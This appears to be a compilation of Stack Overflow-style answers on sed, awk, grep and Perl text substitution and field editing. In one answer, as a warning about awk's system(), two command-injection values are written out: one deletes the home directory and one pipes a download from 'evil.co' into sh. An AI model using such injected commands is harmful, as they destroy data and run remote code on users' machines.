Shell: Substitute a string between two known strings

I wish to replace whatever sits between the abc_def_APP and application1.war strings in file1 with the contents of the new_version variable (13.2.0/8).
Script:
#!/bin/ksh
new_version="13.2.0/8"
old_version=($(grep -r "location=.*application1.war" /path/file1| awk '{print ($1)}'| cut -f8- -d"/"|sed 's/.\{1\}$//'))
echo "$old_version" 'This gives me version number from file1 which needs to be replaced(13.2.0/9)
File1 Contents:
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"

Use the following sed command to do the replacement (with # as the s### delimiter, the / inside $new_version needs no escaping):
sed -i.bak -r "s#^(.*/abc_def_APP/).*(/application1\.war.*)#\1$new_version\2#" /path/file1

With GNU awk (for gensub()):
$ cat file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"
$ new_version="13.2.0/8"
$ gawk -v nv="$new_version" '{$0=gensub(/^(location.*abc_def_APP\/).*(\/application1.war.*)/,"\\1" nv "\\2",1)}1' file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/8/application1.war"
The difference between this and a sed solution is that awk doesn't require you to jump through hoops due to your new_version variable containing a "/" (or any other character).
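For comparison, the "hoops" with sed's default / delimiter mean escaping the slash inside the variable first; a rough sketch (esc_version is just a helper name introduced here):
esc_version=$(printf '%s' "$new_version" | sed 's,/,\\/,g')
sed -i.bak -r "s/^(.*\/abc_def_APP\/).*(\/application1\.war.*)/\1$esc_version\2/" /path/file1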

awk: using bash variable inside the awk script

The following bash code incorporates awk to merge file1 and file2 in a particular way: it detects certain blocks in file2 and inserts all the lines from file1 at those points.
#!/bin/bash
# v 0.09 beta
file1=/usr/data/temp/data1.pdb
file2=/usr/data/temp/data2.pdb
# merge the two
awk -v file="${file1}" '/^ENDMDL$/ {system("cat file");}; {print}' "${file2}" >> output.pdb
The problem is that I cannot use the variable file (which refers to file1 defined in bash) in the awk part:
{system("cat file");}
Otherwise, if I paste the full path of file1 there, it works fine:
{system("cat /usr/data/temp/data1.pdb");}
How can I fix my awk code so that it can use a bash variable there directly?
The Literal (But Evil, Insecure) Answer
To answer your literal question:
awk -v insecure="filename" 'BEGIN { system("cat " insecure) }'
...will run cat filename.
But if someone passed insecure="filename; rm -rf ~" or insecure='$(curl http://evil.co | sh)', you'd have a very bad day.
The Right Answer
Pass the filename on awk's command line, and check FNR to see if you're reading the first file or a subsequent one.
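A minimal sketch of that approach, using the variables from the question:
awk 'NR==FNR { block[++n]=$0; next }                     # first file: remember every line
     /^ENDMDL$/ { for (i=1; i<=n; i++) print block[i] }  # at each marker: emit them
     1' "$file1" "$file2" > output.pdb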
Use GNU Awk's readfile library:
gawk -i readfile -v file1="$file1" 'BEGIN { file1_data = readfile(file1) }
/^ENDMDL$/ { printf "%s", file1_data } 1' ...
Alternatively, you can use a while ((getline line < file1) > 0) loop to fetch the data.
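For example (a sketch; close() lets the file be re-read at the next marker):
awk -v f="$file1" '/^ENDMDL$/ { while ((getline line < f) > 0) print line; close(f) } 1' "$file2" > output.pdb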
This is easier with sed
$ sed '/^ENDMDL$/r file1' file2
This inserts file1 after the marker line.
To replace the marker line with the contents of file1:
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2
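With made-up sample files, the difference between the two looks like this:
$ printf 'ATOM 1\nATOM 2\n' > file1
$ printf 'MODEL 1\nENDMDL\n' > file2
$ sed '/^ENDMDL$/r file1' file2
MODEL 1
ENDMDL
ATOM 1
ATOM 2
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2
MODEL 1
ATOM 1
ATOM 2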

Grep - Getting the character position in the line of each occurrence

According to the manual, the -b option gives the byte offset of each match, but the offset is counted from the beginning of the whole input rather than from the start of the line.
I need to retrieve the position within its line of each match returned by grep. I used this line, but it's quite ugly:
grep '<REGEXP>' | while read -r line ; do echo $line | grep -bo '<REGEXP>' ; done
How can this be done more elegantly, with a more efficient use of the GNU utilities?
Example:
$ echo "abcdefg abcdefg" > test.txt
$ grep 'efg' test.txt | while read -r line ; do echo "$line" | grep -bo 'efg' ; done
4:efg
12:efg
(Indeed, this command line doesn't output the line number, but it's not difficult to add it.)
With any awk (GNU or otherwise) in any shell on any UNIX box:
$ awk -v re='efg' -v OFS=':' '{
    end = 0
    while ( match(substr($0,end+1),re) ) {
        print NR, end+=RSTART, substr($0,end,RLENGTH)
        end += RLENGTH-1
    }
}' test.txt
1:5:efg
1:13:efg
All strings, fields, and array indices in awk start at 1, not zero, hence the output doesn't look like yours: to awk your input string is:
123456789012345
abcdefg abcdefg
rather than:
012345678901234
abcdefg abcdefg
Feel free to change the code above to end+=RSTART-1 and end+=RLENGTH if you prefer 0-indexed strings.
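For reference, a sketch of that change (the substr() start is moved as well so the matched text still prints correctly):
$ awk -v re='efg' -v OFS=':' '{
    end = 0
    while ( match(substr($0,end+1),re) ) {
        end += RSTART-1
        print NR, end, substr($0,end+1,RLENGTH)
        end += RLENGTH
    }
}' test.txt
1:4:efg
1:12:efg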
Perl is not a GNU util, but can solve your problem nicely:
perl -nle 'print "$.:$-[0]" while /efg/g'
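Here $. is the current input line number and $-[0] is the 0-based offset at which the last match started, so for the sample line this prints 1:4 and 1:12.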

Replace third column on all rows of a file in shell

I have a file with about 60 columns of data and roughly 80 million records. I need a bash command to replace the third column with '20190113'. How do we know which column is the third? The columns are delimited by the non-printable character '\001'.
So: replace the third field of every record in a file delimited by the special character '\001' with the value '20190113'.
awk can handle non-printing characters, including \001.
$ cat -v test.in
abc^Axyz^Afoo
def^Awvu^Abar
$ awk '{$3 = "20190113"}1' FS=$'\1' OFS=$'\1' test.in | cat -v
abc^Axyz^A20190113
def^Awvu^A20190113
$'…' is a construction supported by most shells that lets you use escape characters.
^A represents the \001 character; -v tells cat to print that instead of a literal non-printing \001 byte.
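A quick way to see both in action from a bash prompt:
$ printf '%s\n' $'a\1b' | cat -v
a^Ab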
Not as elegant as awk, but here is a method with sed.
a=$(printf "1\0012\0013\0014\0015")
# check
echo "$a" | hexdump -c
b=$(echo "$a" | sed -r 's/([^\x01]*\x01[^\x01]*\x01)[^\x01]*/\120190113/')
# check
echo "$b" | hexdump -c
You can use the hex format "\xdd" to specify the delimiters for awk.
Just set the Input and Output delimiters in the BEGIN section.
$ cat -v brian.txt
abc^Axyz^Afoo
def^Awvu^Abar
$ awk ' BEGIN{ FS=OFS="\x01"} { $3="20190113"; print } ' brian.txt
abcxyz20190113
defwvu20190113
$ awk ' BEGIN{ FS=OFS="\x01"} { $3="20190113"; print } ' brian.txt | cat -v
abc^Axyz^A20190113
def^Awvu^A20190113
$
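Given that the real file has about 80 million records, you will probably want to redirect the result to a scratch file and move it into place, or use GNU awk 4.1+'s inplace extension. A sketch (brian.tmp is just a scratch name):
$ awk ' BEGIN{ FS=OFS="\x01"} { $3="20190113"; print } ' brian.txt > brian.tmp && mv brian.tmp brian.txt
$ gawk -i inplace ' BEGIN{ FS=OFS="\x01"} { $3="20190113"; print } ' brian.txt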
You can try with Perl also
$ perl -F"\x01" -lane ' $F[2]="20190113"; print join("\x01",@F) ' brian.txt
abcxyz20190113
defwvu20190113
$ perl -F"\x01" -lane ' $F[2]="20190113"; print join("\x01",@F) ' brian.txt | cat -v
abc^Axyz^A20190113
def^Awvu^A20190113
$
This might work for you (GNU sed):
sed 's/[^\x01]*/20190113/3' file
This replaces the third occurrence of those characters that do not match \001 with the string 20190113 on every line throughout the file.

BASH: grep text in a long string

Can anyone explain how to write a regex to get a value out of a very long txt file full of metadata? The whole file has no newline separators, just one very long string, which is hard to read or analyze.
I need to grep the values that follow the key username. Can anyone help? I seem to be stuck writing a proper regex expression for this case.
.."somevalue\";s:7:\"text1\";s:8:\"username\";s:9:\"USER1\";s:7:\"company\";s:3:\"text2\";s:5:\ "somevalue\";s:11:\"text11\";s:8:\"username\";s:15:\"USER2\";s:7:\"company\";s:17:\"XXXX\";s:5:\... "somevalue\";s:15:\"text110000\";s:8:\"username\";s:12:\"USER3_HERE\";s:7:\"company\";s:18:\"yyyyy\";s:
In the above example I need the following output
USER1
USER2
USER3_HERE
With Perl it is
perl -wn -le 'print for /\\"username\\";.*?\\"([^\\"]+)/g' filename
-n - process file line by line, but don't print anything
-l - handle line endings
-e - run the following code
print for /\\"username\\";.*?\\"([^\\"]+)/g
Print the captured output whenever you see \"username\"; followed by something followed by \" .
Output
$ perl -wn -le 'print for /\\"username\\";.*?\\"([^\\"]+)/g'
.."somevalue\";s:7:\"text1\";s:8:\"username\";s:9:\"USER1\";s:7:\"company\";s:3:\"text2\";s:5:\ "somevalue\";s:11:\"text11\";s:8:\"username\";s:15:\"USER2\";s:7:\"company\";s:17:\"XXXX\";s:5:\... "somevalue\";s:15:\"text110000\";s:8:\"username\";s:12:\"USER3_HERE\";s:7:\"company\";s:18:\"yyyyy\";s:
USER1
USER2
USER3_HERE
See also
perlrun for the command line switches
perlre for the regular expression used
For input looking like this:
cat <<EOF >file
s:7:\"text1\";s:8:\"username\";s:9:\"USER1\";s:7:\"company\";s:3:\"text2\";s:5:\ "somevalue\";s:11:\"text11\";s:8:\"username\";s:15:\"USER2\";s:7:\"company\";s:17:\"XXXX\";s:5:\... "somevalue\";s:15:\"text110000\";s:8:\"username\";s:12:\"USER3_HERE\";s:7:\"company\";s:18:\"yyyyy\";
EOF
We can:
< file \
tr ';' '\n' |
sed 's/^.*:\\"\(.*\)\\"$/\1/' |
grep -x "USER1\|USER2\|USER3_HERE"
substitute each ; with a newline
keep only the text in between the :\"...\"
grep only for the USER1, USER2 or USER3_HERE strings
With GNU awk (for clarity, the field number i is printed in front of each $i here):
$ gawk 'BEGIN{FS="\\\\\""} {for (i=1;i<=NF;i++) if (match($i, /USER/)) print i, $i}' file
7 USER1
18 USER2
29 USER3_HERE
If you want the field following those fields:
$ gawk 'BEGIN{FS="\\\\\""} {for (i=1;i<=NF;i++) if (match($i, /USER/)) print $i, $(i+1)}' file
USER1 ;s:7:
USER2 ;s:7:
USER3_HERE ;s:7:
You can use GNU grep:
$ ggrep -oP 'USER[^;]*;([^\\]*)\\"company' file
USER1\";s:7:\"company
USER2\";s:7:\"company
USER3_HERE\";s:7:\"company
Or Perl if you just want the match group:
$ perl -lnE 'say for /USER[^;]*;([^\\]*)\\"company/g' file
s:7:
s:7:
s:7:
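If your GNU grep has PCRE support (-P), a \K pattern is one way to print only the usernames. This is a sketch that assumes the backslashes appear literally in the file, exactly as in the sample:
$ grep -oP 'username\\";s:\d+:\\"\K[^\\]+' file
USER1
USER2
USER3_HERE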

replacing strings in a configuration file with shell scripting

I have a configuration file with fields separated by semicolons ;. Something like:
user@raspberrypi /home/pi $ cat file
string11;string12;string13;
string21;string22;string23;
string31;string32;string33;
I can get the strings I need with awk:
user@raspberrypi /home/pi $ cat file | grep 21 | awk -F ";" '{print $2}'
string22
And I'd like to change string22 to hello_world via a script.
Any idea how to do it? I think it should be with sed but I have no idea how.
I prefer Perl over sed. Here is a one-liner that modifies the file in place.
perl -i -F';' -lane '
BEGIN { $" = q|;| }
if ( m/21/ ) { $F[1] = q|hello_world| };
print qq|@F|
' infile
Use -i.bak instead of -i to create a backup file with .bak as suffix.
It yields:
string11;string12;string13
string21;hello_world;string23
string31;string32;string33
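(Note that the trailing ; on each line is gone: -a splits with Perl's split, which drops trailing empty fields, so only the three non-empty fields are joined back together.)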
First drop the useless use of cat and grep so:
$ cat file | grep 21 | awk -F';' '{print $2}'
Becomes:
$ awk -F';' '/21/{print $2}' file
To change this value you would do:
$ awk '/21/{$2="hello_world"}1' FS=';' OFS=';' file
To store the changes back to the file:
$ awk '/21/{$2="hello_world"}1' FS=';' OFS=';' file > tmp && mv tmp file
However if all you want to do is replace string22 with hello_world I would suggest using sed instead:
$ sed 's/string22;/hello_world;/g' file
With sed you can use the -i option to store the changes back to the file:
$ sed -i 's/string22;/hello_world;/g' file
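If the row should be selected by its exact first field rather than by a 21 appearing anywhere on the line, a stricter awk variant (a sketch) would be:
$ awk -F';' -v OFS=';' '$1=="string21" { $2="hello_world" } 1' file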
Even though we can do this easily in awk, as Sudo suggested, I prefer Perl since it does in-place replacement.
perl -pe 's/(^[^\;]*;)[^\;]*(;.*)/$1hello_world$2/g if(/21/)' your_file
For in-place editing, just add an i:
perl -pi -e 's/(^[^\;]*;)[^\;]*(;.*)/$1hello_world$2/g if(/21/)' your_file
Tested below:
> perl -pe 's/(^[^\;]*;)[^\;]*(;.*)/$1"hello_world"$2/g if(/21/)' temp
string11;string12;string13;
string21;"hello_world";string23;
string31;string32;string33;
> perl -pe 's/(^[^\;]*;)[^\;]*(;.*)/$1hello_world$2/g if(/21/)' temp
string11;string12;string13;
string21;hello_world;string23;
string31;string32;string33;
>
